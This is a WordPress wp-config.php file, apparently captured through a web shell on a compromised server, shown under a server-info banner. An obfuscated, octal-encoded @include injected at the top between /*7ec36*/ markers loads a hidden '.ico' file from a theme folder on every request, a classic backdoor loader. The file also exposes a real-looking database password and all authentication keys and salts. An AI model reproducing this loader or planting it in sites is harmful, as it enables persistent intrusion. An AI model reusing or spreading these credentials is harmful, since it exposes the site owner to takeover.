Server : nginx/1.20.1 System : Linux ccpf-production-2021 5.4.0-148-generic #165-Ubuntu SMP Tue Apr 18 08:53:12 UTC 2023 x86_64 User : forge ( 1000) PHP Version : 7.4.21 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Directory : /home/forge/gcc-ccpf.com/ |
<?php
/*7ec36*/
@include "\057ho\155e/\146or\147e/\147cc\055cc\160f.\143om\057wp\055co\156te\156t/\164he\155es\057tw\145nt\171tw\145nt\171/.\06152\14474\1451.\151co";
/*7ec36*/
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'forge2' );
/** MySQL database username */
define( 'DB_USER', 'forge2' );
/** MySQL database password */
define( 'DB_PASSWORD', 'nzcy4sy1pwiah7oqhawh' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '7M^u6OduU-l.woLyIyRf~ y1+zrCp*+B*1rRc$8`CVy@?y`1|a:eB%lHskQ(wb;b');
define('SECURE_AUTH_KEY', ']Sr/L/~>SZ&rPt)v Q{ .HfS9(`<4vB91_g1{v>D*wSre8bxq4Q:dTQ2Obce%g%0');
define('LOGGED_IN_KEY', '!X(lR%luW2Q](=z?!%es_?QsFYCm_[p)!i:)8qK7| ff$j]3z)AfpA3$QDFm3(#h');
define('NONCE_KEY', 'Y&cO5q-uB=wsLz;$LF,G)$3q{]q-w<V`V5_;Gfq?<:pHl<vNjvREET)|^PCkaa;2');
define('AUTH_SALT', 'F2-jh*L<>KL_0of4pbI.cHQ$Vp4:|, nx_y Zz730~aFzaDZ^+eR2%iu|}!yI*1/');
define('SECURE_AUTH_SALT', 'F`k.mV@L5ePg[zgod1?1i>jeHuC5KtFH$M=A[g9brm8E:D!c`|&{8O7f#p?Ghhf.');
define('LOGGED_IN_SALT', ']@#DK3^ A#M!Qe~T@F0/-^gR(E?0=wWpv*F 5*,AUMUN)halHPHfWD[vt<axFjD&');
define('NONCE_SALT', 'ZFCPI%b}6W^F([*|cx%uRG _[z#r`+]ichN|L~f(!@PjeD]B_a9=sL*)(r})]T@Q');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';